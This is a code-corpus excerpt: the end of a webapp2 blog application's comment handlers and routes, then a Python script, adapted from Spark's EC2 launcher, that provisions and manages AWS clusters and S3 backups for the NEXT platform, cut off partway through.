comment_id = self.request.get('comment_id')
blog = self.blog_exists(blog_id)
if self.user and blog:
if self.user_owns_comment(self.user, blog,
comment_id):
# delete comment
bdb.BlogPost.delete_comment(blog, comment_id)
# re-render the blog
self.redirect('/blog/{}'.format(int(blog_id)))
else:
# user not logged in
self.redirect('/blog/login')
else:
# user not logged in
self.redirect('/blog/login')
class blogeditcomment(Handler):
""" handler to manage edit comments on a blog """
def get(self, blog_id):
""" test whether logged in and not owner """
blog = self.blog_exists(blog_id)
comment_id = self.request.get('cid')
try:
comment_index = int(comment_id)
if self.user and blog:
# user logged in
if self.user_owns_comment(self.user,
blog, comment_index):
e = {'editcomment': comment_id}
else:
e = {'error': 'you do not own this comment'}
# show post
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# bad login
self.redirect('/blog/login')
except:
# bad comment id so show login
self.redirect('/blog/login')
def post(self, blog_id):
""" save the comment if logged in and the comment is ok """
blog = self.blog_exists(blog_id)
comment = self.request.get('updatecomment')
comment_id = self.request.get('comment_id')
if self.user and blog:
# user logged in
if self.user_owns_comment(self.user, blog, comment_id):
try:
comment_index = int(comment_id)
if comment:
# comment isn't empty
bdb.BlogPost.save_comment(self.user, blog,
comment_index, comment)
e = None
else:
e = {'error': 'comment cannot be blank'}
e['editcomment'] = comment_id
except ValueError:
# comment id is not an integer / valid
e = {'error': 'bad comment id'}
else:
# comment is not owned by user
e = {'error': 'you do not own this comment'}
# render the view post page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# user not logged in or bad blog
self.redirect('/blog/login')
# register page handlers
app = webapp2.WSGIApplication([
('/blog', blog),
('/blog/logout', logout),
('/blog/login', login),
('/blog/signup', signup),
('/blog/welcome', welcome),
('/blog/new', newpost),
('/blog/([0-9]+)', viewpost),
('/blog/edit/([0-9]+)', blogedit),
('/blog/comment/([0-9]+)', blogcomment),
('/blog/editcomment/([0-9]+)', blogeditcomment),
('/blog/deletecomment', blogdeletecomment),
('/blog/like', bloglike)
],
debug=False)
| mit | 4,515,155,355,139,144,700 | 32.634185 | 78 | 0.528616 | false |
lalitkumarj/NEXT-psych | ec2/next_ec2.py | 1 | 52111 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file was forked from the Apache Spark project and modified. Many
# thanks to those guys for a great time-saving file.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import with_statement
import hashlib
import logging
import os
import pipes
import random
import shutil
import string
import subprocess
import sys
import tarfile
import tempfile
import textwrap
import time
import urllib2
import warnings
from datetime import datetime
from optparse import OptionParser
from sys import stderr
"""
# launch a new cluster of instance type "c3.8xlarge" (see http://www.ec2instances.info or below for other choices)
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --instance-type=c3.8xlarge launch kevin_dev
# get the public-DNS of your machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem get-master kevin_dev
# rsync the next-discovery code up to your machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem rsync kevin_dev
# login to your machine manually or use
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem login kevin_dev
# restore from database file already on S3
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --backup-filename=mongo_dump_next-test1.discovery.wisc.edu_2015-04-22_01:09:42.tar.gz restore kevin_dev
# display all files in a bucket with a given prefix. Useful if you need to find a database to backup from. Will display all files is prefix is not given
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --bucket=next.discovery --prefix=mongo_dump_next-test1.discovery.wisc.edu listbucket kevin_dev
# create a new S3 bucket and obtain the unique bucket name
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem createbucket kevin_dev
# force the current machine to perform a backup NOW to a designated filename
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --backup-filename=this_is_a_custom_filename backup kevin_dev
# stop the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem stop kevin_dev
# start the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem start kevin_dev
# terminate the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem destroy kevin_dev
"""
NEXT_BACKEND_GLOBAL_PORT = 8000
NEXT_FRONTEND_GLOBAL_PORT = 80
EC2_SRC_PATH = '/usr/local'
EC2_NEXT_PATH = EC2_SRC_PATH + '/next-discovery'
LOCAL_NEXT_PATH = './../'
DEFAULT_REGION = 'us-west-2'
DEFAULT_AMI = 'ami-6989a659' # Ubuntu Server 14.04 LTS
DEFAULT_USER = 'ubuntu'
DEFAULT_INSTANCE_TYPE = 'm3.large'
import boto
from boto.ec2.blockdevicemapping import BlockDeviceMapping, BlockDeviceType, EBSBlockDeviceType
from boto import ec2
class UsageError(Exception):
pass
instance_info = {
"c1.medium" : { "cpu": 2, "memory": 1.7, "cost_per_hr": 0.13 },
"c1.xlarge" : { "cpu": 8, "memory": 7, "cost_per_hr": 0.52 },
"c3.large" : { "cpu": 2, "memory": 3.75, "cost_per_hr": 0.105 },
"c3.xlarge" : { "cpu": 4, "memory": 7.5, "cost_per_hr": 0.21 },
"c3.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.42 },
"c3.4xlarge" : { "cpu": 16, "memory": 30, "cost_per_hr": 0.84 },
"c3.8xlarge" : { "cpu": 32, "memory": 60, "cost_per_hr": 1.68 },
"c4.large" : { "cpu": 2, "memory": 3.75, "cost_per_hr": 0.116 },
"c4.xlarge" : { "cpu": 4, "memory": 7.5, "cost_per_hr": 0.232 },
"c4.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.464 },
"c4.4xlarge" : { "cpu": 16, "memory": 30, "cost_per_hr": 0.928 },
"c4.8xlarge" : { "cpu": 36, "memory": 60, "cost_per_hr": 1.856 },
"cc2.8xlarge" : { "cpu": 32, "memory": 60.5, "cost_per_hr": 2 },
"cr1.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 3.5 },
"d2.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.69 },
"d2.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 1.38 },
"d2.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 2.76 },
"d2.8xlarge" : { "cpu": 36, "memory": 244, "cost_per_hr": 5.52 },
"g2.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.65 },
"g2.8xlarge" : { "cpu": 32, "memory": 60, "cost_per_hr": 2.6 },
"hi1.4xlarge" : { "cpu": 16, "memory": 60.5, "cost_per_hr": 3.1 },
"hs1.8xlarge" : { "cpu": 16, "memory": 117, "cost_per_hr": 4.6 },
"i2.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.853 },
"i2.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 1.705 },
"i2.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 3.41 },
"i2.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 6.82 },
"m1.small" : { "cpu": 1, "memory": 1.7, "cost_per_hr": 0.044 },
"m1.medium" : { "cpu": 1, "memory": 3.75, "cost_per_hr": 0.087 },
"m1.large" : { "cpu": 2, "memory": 7.5, "cost_per_hr": 0.175 },
"m1.xlarge" : { "cpu": 4, "memory": 15, "cost_per_hr": 0.35 },
"m2.xlarge" : { "cpu": 2, "memory": 17.1, "cost_per_hr": 0.245 },
"m2.2xlarge" : { "cpu": 4, "memory": 34.2, "cost_per_hr": 0.49 },
"m2.4xlarge" : { "cpu": 8, "memory": 68.4, "cost_per_hr": 0.98 },
"m3.medium" : { "cpu": 1, "memory": 3.75, "cost_per_hr": 0.07 },
"m3.large" : { "cpu": 2, "memory": 7.5, "cost_per_hr": 0.14 },
"m3.xlarge" : { "cpu": 4, "memory": 15, "cost_per_hr": 0.28 },
"m3.2xlarge" : { "cpu": 8, "memory": 30, "cost_per_hr": 0.56 },
"r3.large" : { "cpu": 2, "memory": 15, "cost_per_hr": 0.175 },
"r3.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.35 },
"r3.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 0.7 },
"r3.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 1.4 },
"r3.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 2.8 },
"t1.micro" : { "cpu": 1, "memory": 0.615, "cost_per_hr": 0.02 },
"t2.micro" : { "cpu": 1, "memory": 1, "cost_per_hr": 0.013 },
"t2.small" : { "cpu": 1, "memory": 2, "cost_per_hr": 0.026 },
"t2.medium" : { "cpu": 2, "memory": 4, "cost_per_hr": 0.052 },
}
# Configure and parse our command-line arguments
def parse_args():
parser = OptionParser(
prog="spark-ec2",
version="%prog {v}".format(v=''),
usage="%prog [options] <action> <cluster_name>\n\n"
+ "<action> can be: launch, destroy, login, stop, start, get-master, reboot-slaves, rsync, backup, restore, docker_up, docker_login, listbucket, createbucket")
parser.add_option(
"-s", "--slaves", type="int", default=0,
help="Number of slaves to launch (default: %default)")
parser.add_option(
"-k", "--key-pair",
help="Key pair to use on instances")
parser.add_option(
"-i", "--identity-file",
help="SSH private key file to use for logging into instances")
parser.add_option(
"-t", "--instance-type", default=DEFAULT_INSTANCE_TYPE,
help="Type of instance to launch (default: %default). " +
"WARNING: must be 64-bit; small instances won't work")
parser.add_option(
"-m", "--master-instance-type", default="",
help="Master instance type (leave empty for same as instance-type)")
parser.add_option(
"-r", "--region", default=DEFAULT_REGION,
help="EC2 region zone to launch instances in")
parser.add_option(
"-z", "--zone", default="",
help="Availability zone to launch instances in, or 'all' to spread " +
"slaves across multiple (an additional $0.01/Gb for bandwidth" +
"between zones applies) (default: a single zone chosen at random)")
parser.add_option("-a", "--ami", default=DEFAULT_AMI,
help="Amazon Machine Image ID to use (default: %default). ")
parser.add_option(
"-D", metavar="[ADDRESS:]PORT", dest="proxy_port",
help="Use SSH dynamic port forwarding to create a SOCKS proxy at " +
"the given local address (for use with login)")
parser.add_option(
"--resume", action="store_true", default=False,
help="Resume installation on a previously launched cluster " +
"(for debugging)")
parser.add_option(
"--ebs-vol-size", metavar="SIZE", type="int", default=0,
help="Size (in GB) of each EBS volume.")
parser.add_option(
"--ebs-vol-type", default="standard",
help="EBS volume type (e.g. 'gp2', 'standard').")
parser.add_option(
"--ebs-vol-num", type="int", default=1,
help="Number of EBS volumes to attach to each node as /vol[x]. " +
"The volumes will be deleted when the instances terminate. " +
"Only possible on EBS-backed AMIs. " +
"EBS volumes are only attached if --ebs-vol-size > 0." +
"Only support up to 8 EBS volumes.")
parser.add_option(
"--root-vol-size", metavar="SIZE", type="int", default=120,
help="Size (in GB) of the root volume.")
parser.add_option(
"--root-vol-num", type="int", default=1,
help="Number of root volumes to attach to each node")
parser.add_option("--placement-group", type="string", default=None,
help="Which placement group to try and launch " +
"instances into. Assumes placement group is already " +
"created.")
parser.add_option(
"--swap", metavar="SWAP", type="int", default=1024,
help="Swap space to set up per node, in MB (default: %default)")
parser.add_option(
"--spot-price", metavar="PRICE", type="float",
help="If specified, launch slaves as spot instances with the given " +
"maximum price (in dollars)")
parser.add_option(
"-u", "--user", default=DEFAULT_USER,
help="The SSH user you want to connect as (default: %default)")
parser.add_option(
"--delete-groups", action="store_true", default=False,
help="When destroying a cluster, delete the security groups that were created")
parser.add_option(
"--use-existing-master", action="store_true", default=False,
help="Launch fresh slaves, but use an existing stopped master if possible")
parser.add_option(
"--worker-instances", type="int", default=1,
help="Number of instances per worker: variable SPARK_WORKER_INSTANCES (default: %default)")
parser.add_option(
"--master-opts", type="string", default="",
help="Extra options to give to master through SPARK_MASTER_OPTS variable " +
"(e.g -Dspark.worker.timeout=180)")
parser.add_option(
"--user-data", type="string", default="",
help="Path to a user-data file (most AMI's interpret this as an initialization script)")
parser.add_option(
"--authorized-address", type="string", default="0.0.0.0/0",
help="Address to authorize on created security groups (default: %default)")
parser.add_option(
"--additional-security-group", type="string", default="",
help="Additional security group to place the machines in")
parser.add_option(
"--copy-aws-credentials", action="store_true", default=False,
help="Add AWS credentials to hadoop configuration to allow Spark to access S3")
parser.add_option(
"--subnet-id", default=None, help="VPC subnet to launch instances in")
parser.add_option(
"--vpc-id", default=None, help="VPC to launch instances in")
parser.add_option(
"--backup-filename", default=None, help="The filename (with extension) of the backup filename on EC2 to backup to or restore from. Only has effect on action={backup,restore}")
parser.add_option(
"--bucket", default=None, help="The name (with extension) of unique bucket to list files from. Only has effect on action={listbucket}")
parser.add_option(
"--prefix", default=None, help="A prefix to filter files in a bucket with. Only has effect on action={listbucket}")
(opts, args) = parser.parse_args()
if len(args) != 2:
parser.print_help()
sys.exit(1)
(action, cluster_name) = args
# Boto config check
# http://boto.cloudhackers.com/en/latest/boto_config_tut.html
home_dir = os.getenv('HOME')
if home_dir is None or not os.path.isfile(home_dir + '/.boto'):
if not os.path.isfile('/etc/boto.cfg'):
if os.getenv('AWS_ACCESS_KEY_ID') is None:
print >> stderr, ("ERROR: The environment variable AWS_ACCESS_KEY_ID " +
"must be set")
sys.exit(1)
if os.getenv('AWS_SECRET_ACCESS_KEY') is None:
print >> stderr, ("ERROR: The environment variable AWS_SECRET_ACCESS_KEY " +
"must be set")
sys.exit(1)
return (opts, action, cluster_name)
# Get the EC2 security group of the given name, creating it if it doesn't exist
def get_or_make_group(conn, name, vpc_id):
groups = conn.get_all_security_groups()
group = [g for g in groups if g.name == name]
if len(group) > 0:
return group[0]
else:
print "Creating security group " + name
return conn.create_security_group(name, "NEXT EC2 group", vpc_id)
# Check whether a given EC2 instance object is in a state we consider active,
# i.e. not terminating or terminated. We count both stopping and stopped as
# active since we can restart stopped clusters.
def is_active(instance):
return (instance.state in ['pending', 'running', 'stopping', 'stopped'])
# Launch a cluster of the given name, by setting up its security groups,
# and then starting new instances in them.
# Returns a tuple of EC2 reservation objects for the master and slaves
# Fails if there already instances running in the cluster's groups.
def launch_cluster(conn, opts, cluster_name):
if opts.identity_file is None:
print >> stderr, "ERROR: Must provide an identity file (-i) for ssh connections."
sys.exit(1)
if opts.key_pair is None:
print >> stderr, "ERROR: Must provide a key pair name (-k) to use on instances."
sys.exit(1)
user_data_content = None
if opts.user_data:
with open(opts.user_data) as user_data_file:
user_data_content = user_data_file.read()
print "Setting up security groups..."
master_group = get_or_make_group(conn, cluster_name + "-master", opts.vpc_id)
if opts.slaves>0: slave_group = get_or_make_group(conn, cluster_name + "-slaves", opts.vpc_id)
authorized_address = opts.authorized_address
if master_group.rules == []: # Group was just now created
if opts.slaves>0:
if opts.vpc_id is None:
master_group.authorize(src_group=master_group)
master_group.authorize(src_group=slave_group)
else:
master_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=master_group)
master_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=master_group)
master_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=master_group)
master_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=slave_group)
master_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=slave_group)
master_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=slave_group)
master_group.authorize('tcp', 22, 22, authorized_address)
master_group.authorize('tcp', NEXT_BACKEND_GLOBAL_PORT, NEXT_BACKEND_GLOBAL_PORT, authorized_address)
#master_group.authorize('tcp', NEXT_FRONTEND_BASE_GLOBAL_PORT, NEXT_FRONTEND_BASE_GLOBAL_PORT, authorized_address)
master_group.authorize('tcp', NEXT_FRONTEND_GLOBAL_PORT, NEXT_FRONTEND_GLOBAL_PORT, authorized_address)
master_group.authorize('tcp', 5555, 5555, authorized_address)
master_group.authorize('tcp', 8888, 8888, authorized_address)
master_group.authorize('tcp', 15672, 15672, authorized_address)
master_group.authorize('tcp', 28017, 28017, authorized_address)
if opts.slaves>0 and slave_group.rules == []: # Group was just now created
if opts.vpc_id is None:
slave_group.authorize(src_group=master_group)
slave_group.authorize(src_group=slave_group)
else:
slave_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=master_group)
slave_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=master_group)
slave_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=master_group)
slave_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=slave_group)
slave_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=slave_group)
slave_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=slave_group)
slave_group.authorize('tcp', 22, 22, authorized_address)
# Check if instances are already running in our groups
existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
die_on_error=False)
if existing_slaves or (existing_masters and not opts.use_existing_master):
print >> stderr, ("ERROR: There are already instances running in " +
"the desired group")
sys.exit(1)
# we use group ids to work around https://github.com/boto/boto/issues/350
additional_group_ids = []
if opts.additional_security_group:
additional_group_ids = [sg.id
for sg in conn.get_all_security_groups()
if opts.additional_security_group in (sg.name, sg.id)]
print "Launching instances..."
try:
image = conn.get_all_images(image_ids=[opts.ami])[0]
except:
print >> stderr, "Could not find AMI " + opts.ami
sys.exit(1)
# Create block device mapping so that we can add EBS volumes if asked to.
# The first drive is attached as /dev/sds, 2nd as /dev/sdt, ... /dev/sdz
block_map = BlockDeviceMapping()
# if opts.instance_type.startswith('m3.'):
for i in range(opts.root_vol_num):
dev = EBSBlockDeviceType()
dev.size = opts.root_vol_size
# dev.ephemeral_name = 'ephemeral%d' % i
# The first ephemeral drive is /dev/sda1.
name = '/dev/sd' + string.letters[i] + str(i+1)
block_map[name] = dev
if opts.ebs_vol_size > 0:
for i in range(opts.ebs_vol_num):
device = EBSBlockDeviceType()
device.size = opts.ebs_vol_size
device.volume_type = opts.ebs_vol_type
device.delete_on_termination = True
block_map["/dev/sd" + chr(ord('s') + i)] = device
# Launch slaves
if opts.slaves>0:
if opts.spot_price is not None:
# Launch spot instances with the requested price
print ("Requesting %d slaves as spot instances with price $%.3f" %
(opts.slaves, opts.spot_price))
zones = get_zones(conn, opts)
num_zones = len(zones)
i = 0
my_req_ids = []
for zone in zones:
num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
slave_reqs = conn.request_spot_instances(
price=opts.spot_price,
image_id=opts.ami,
launch_group="launch-group-%s" % cluster_name,
placement=zone,
count=num_slaves_this_zone,
key_name=opts.key_pair,
security_group_ids=[slave_group.id] + additional_group_ids,
instance_type=opts.instance_type,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
my_req_ids += [req.id for req in slave_reqs]
i += 1
print "Waiting for spot instances to be granted..."
try:
while True:
time.sleep(10)
reqs = conn.get_all_spot_instance_requests()
id_to_req = {}
for r in reqs:
id_to_req[r.id] = r
active_instance_ids = []
for i in my_req_ids:
if i in id_to_req and id_to_req[i].state == "active":
active_instance_ids.append(id_to_req[i].instance_id)
if len(active_instance_ids) == opts.slaves:
print "All %d slaves granted" % opts.slaves
reservations = conn.get_all_reservations(active_instance_ids)
slave_nodes = []
for r in reservations:
slave_nodes += r.instances
break
else:
print "%d of %d slaves granted, waiting longer" % (
len(active_instance_ids), opts.slaves)
except:
print "Canceling spot instance requests"
conn.cancel_spot_instance_requests(my_req_ids)
# Log a warning if any of these requests actually launched instances:
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
running = len(master_nodes) + len(slave_nodes)
if running:
print >> stderr, ("WARNING: %d instances are still running" % running)
sys.exit(0)
else:
# Launch non-spot instances
zones = get_zones(conn, opts)
num_zones = len(zones)
i = 0
slave_nodes = []
for zone in zones:
num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
if num_slaves_this_zone > 0:
slave_res = image.run(key_name=opts.key_pair,
security_group_ids=[slave_group.id] + additional_group_ids,
instance_type=opts.instance_type,
placement=zone,
min_count=num_slaves_this_zone,
max_count=num_slaves_this_zone,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
slave_nodes += slave_res.instances
print "Launched %d slaves in %s, regid = %s" % (num_slaves_this_zone,
zone, slave_res.id)
i += 1
else:
slave_nodes = []
# Launch or resume masters
if existing_masters:
print "Starting master..."
for inst in existing_masters:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
master_nodes = existing_masters
else:
master_type = opts.master_instance_type
if master_type == "":
master_type = opts.instance_type
if opts.zone == 'all':
opts.zone = random.choice(conn.get_all_zones()).name
master_res = image.run(key_name=opts.key_pair,
security_group_ids=[master_group.id] + additional_group_ids,
instance_type=master_type,
placement=opts.zone,
min_count=1,
max_count=1,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
master_nodes = master_res.instances
print "Launched master in %s, regid = %s" % (opts.zone, master_res.id)
# This wait time corresponds to SPARK-4983
print "Waiting for AWS to propagate instance metadata..."
time.sleep(5)
# Give the instances descriptive names
for master in master_nodes:
master.add_tag(
key='Name',
value='{cn}-master-{iid}'.format(cn=cluster_name, iid=master.id))
for slave in slave_nodes:
slave.add_tag(
key='Name',
value='{cn}-slave-{iid}'.format(cn=cluster_name, iid=slave.id))
# Return all the instances
return (master_nodes, slave_nodes)
# Get the EC2 instances in an existing cluster if available.
# Returns a tuple of lists of EC2 instance objects for the masters and slaves
def get_existing_cluster(conn, opts, cluster_name, die_on_error=True):
print "Searching for existing cluster " + cluster_name + "..."
reservations = conn.get_all_reservations()
master_nodes = []
slave_nodes = []
for res in reservations:
active = [i for i in res.instances if is_active(i)]
for inst in active:
group_names = [g.name for g in inst.groups]
if (cluster_name + "-master") in group_names:
master_nodes.append(inst)
elif (cluster_name + "-slaves") in group_names:
slave_nodes.append(inst)
if any((master_nodes, slave_nodes)):
print "Found %d master(s), %d slaves" % (len(master_nodes), len(slave_nodes))
if master_nodes != [] or not die_on_error:
return (master_nodes, slave_nodes)
else:
if master_nodes == [] and slave_nodes != []:
print >> sys.stderr, "ERROR: Could not find master in group " + cluster_name + "-master"
else:
print >> sys.stderr, "ERROR: Could not find any existing cluster"
sys.exit(1)
# Deploy configuration files and run setup scripts on a newly launched
# or started EC2 cluster.
def setup_cluster(conn, master_nodes, slave_nodes, opts, deploy_ssh_key):
master = master_nodes[0].public_dns_name
if deploy_ssh_key:
print "Generating cluster's SSH key on master..."
key_setup = """
[ -f ~/.ssh/id_rsa ] ||
(ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa &&
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys)
"""
ssh(master, opts, key_setup)
dot_ssh_tar = ssh_read(master, opts, ['tar', 'c', '.ssh'])
print "Transferring cluster's SSH key to slaves..."
for slave in slave_nodes:
print slave.public_dns_name
ssh_write(slave.public_dns_name, opts, ['tar', 'x'], dot_ssh_tar)
print "Running setup on master..."
setup_next_cluster(master, opts)
print "Done!"
print "Start rsync of local next-discovery source code up"
rsync_dir(LOCAL_NEXT_PATH, EC2_NEXT_PATH, opts, master)
print "Done!"
print "Running docker-compose up on master..."
docker_up(opts, master_nodes, slave_nodes)
def rsync_dir(local_src_dir, ec2_dest_dir, opts, host):
command = [
'rsync', '--exclude=.git', '--exclude=archive', '-rve',
stringify_command(ssh_command(opts)),
"%s" % local_src_dir,
"%s@%s:%s/" % (opts.user, host, ec2_dest_dir)
]
subprocess.check_call(command)
def setup_next_cluster(master, opts):
# Create a temp directory in which we will place all the files to be
# deployed after we substitue template parameters in them
tmp_dir = tempfile.mkdtemp()
with open('./templates/setup.sh') as src:
with open(tmp_dir+'/setup.sh', "w") as dest:
text = src.read()
# text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
# rsync the whole directory over to the master machine
ssh(master, opts, "sudo rm -rf " + EC2_NEXT_PATH)
ssh(master, opts, "sudo mkdir " + EC2_NEXT_PATH)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH)
command = [
'rsync', '-rv',
'-e', stringify_command(ssh_command(opts)),
"%s/" % tmp_dir,
"%s@%s:%s/" % (opts.user, master, EC2_NEXT_PATH)
]
subprocess.check_call(command)
# Remove the temp directory we created above
shutil.rmtree(tmp_dir)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'setup.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'setup.sh')
def docker_up(opts, master_nodes, slave_nodes):
rsync_docker_config(opts, master_nodes, slave_nodes)
master = master_nodes[0].public_dns_name
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'docker_up.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'docker_up.sh')
def docker_login(opts, master_nodes, slave_nodes):
rsync_docker_config(opts, master_nodes, slave_nodes)
master = master_nodes[0].public_dns_name
import signal
def preexec_function():
# Ignore the SIGINT signal by setting the handler to the standard
# signal handler SIG_IGN.
signal.signal(signal.SIGINT, signal.SIG_IGN)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'docker_login.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'docker_login.sh')
def list_bucket(opts):
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')
conn = boto.connect_s3( AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY )
print "Trying to connect to bucket %s"%(opts.bucket)
try:
bucket = conn.get_bucket( opts.bucket )
if hasattr(opts,'prefix'):
print [ key.name.encode( "utf-8" ) for key in bucket.list(prefix=opts.prefix) ]
else:
print [ key.name.encode( "utf-8" ) for key in bucket.list() ]
except boto.exception.S3ResponseError, e:
print "This bucket does not exist. Please create a new bucket using createbucket command."
def createbucket(opts):
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')
conn = boto.connect_s3( AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY )
gotbucket = False
while not gotbucket:
bucket_uid = '%030x' % random.randrange(16**30)
try:
newbucket = conn.create_bucket(bucket_uid)
gotbucket = True
except boto.exception.S3CreateError, e:
pass
print 'Your AWS S3 bucket has been successfully created with bucket name set as: ', bucket_uid
print
print 'To automatically use this bucket, input the following command into your terminal:'
print 'export AWS_BUCKET_NAME='+bucket_uid
def rsync_docker_config(opts, master_nodes, slave_nodes):
master = master_nodes[0].public_dns_name
opts.master_instance_type = master_nodes[0].instance_type
if len(slave_nodes)>0:
opts.instance_type = slave_nodes[0].instance_type
master_num_cpus = instance_info[opts.master_instance_type]['cpu']
slave_num_cpus = instance_info[opts.instance_type]['cpu']
# Create a temp directory in which we will place all the files to be
# deployed after we substitue template parameters in them
tmp_dir = tempfile.mkdtemp()
master_environment_vars = {
"MASTER_LIST": ','.join([i.public_dns_name for i in master_nodes]),
"ACTIVE_MASTER": master,
"SLAVE_LIST": ','.join([i.public_dns_name for i in slave_nodes]),
"NEXT_BACKEND_GLOBAL_HOST": master,
"NEXT_BACKEND_GLOBAL_PORT": NEXT_BACKEND_GLOBAL_PORT,
"NEXT_FRONTEND_GLOBAL_HOST":master,
"NEXT_FRONTEND_GLOBAL_PORT":NEXT_FRONTEND_GLOBAL_PORT,
"AWS_ACCESS_ID":os.getenv('AWS_ACCESS_KEY_ID'),
"AWS_SECRET_ACCESS_KEY":os.getenv('AWS_SECRET_ACCESS_KEY'),
"AWS_BUCKET_NAME":os.getenv('AWS_BUCKET_NAME','next-database-backups')
}
with open('./templates/docker_login.sh') as src:
with open(tmp_dir+'/docker_login.sh', "w") as dest:
text = src.read()
env_vars = ''
for key in master_environment_vars:
env_vars += 'export ' + str(key) + '=' + str(master_environment_vars[key]) + '\n'
text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
with open('./templates/docker_up.sh') as src:
with open(tmp_dir+'/docker_up.sh', "w") as dest:
text = src.read()
env_vars = ''
for key in master_environment_vars:
env_vars += 'export ' + str(key) + '=' + str(master_environment_vars[key]) + '\n'
text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
num_sync_workers = 6 # should be abotu the number of active algorithms
unicorn_multiplier = .15
docker_compose_template_vars = {
"DATABASE_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
"CELERY_SYNC_WORKER_COUNT": num_sync_workers,
"CELERY_ASYNC_WORKER_COUNT":2,
"CELERY_THREADS_PER_ASYNC_WORKER":max(1,int(.35*master_num_cpus)),
"NEXT_BACKEND_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
